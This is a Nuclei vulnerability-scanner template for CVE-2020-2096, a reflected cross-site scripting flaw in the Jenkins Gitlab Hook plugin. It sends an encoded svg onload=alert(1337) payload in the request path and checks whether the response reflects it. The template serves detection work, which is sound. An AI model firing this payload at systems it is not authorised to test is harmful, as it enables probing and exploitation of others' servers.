nuclei-templates/cves/CVE-2020-2096.yaml

20 lines
344 B
YAML
Raw Normal View History

2020-04-08 10:59:57 +00:00
id: CVE-2020-2096
info:
name: Jenkins Gitlab Hook XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "1337"
part: body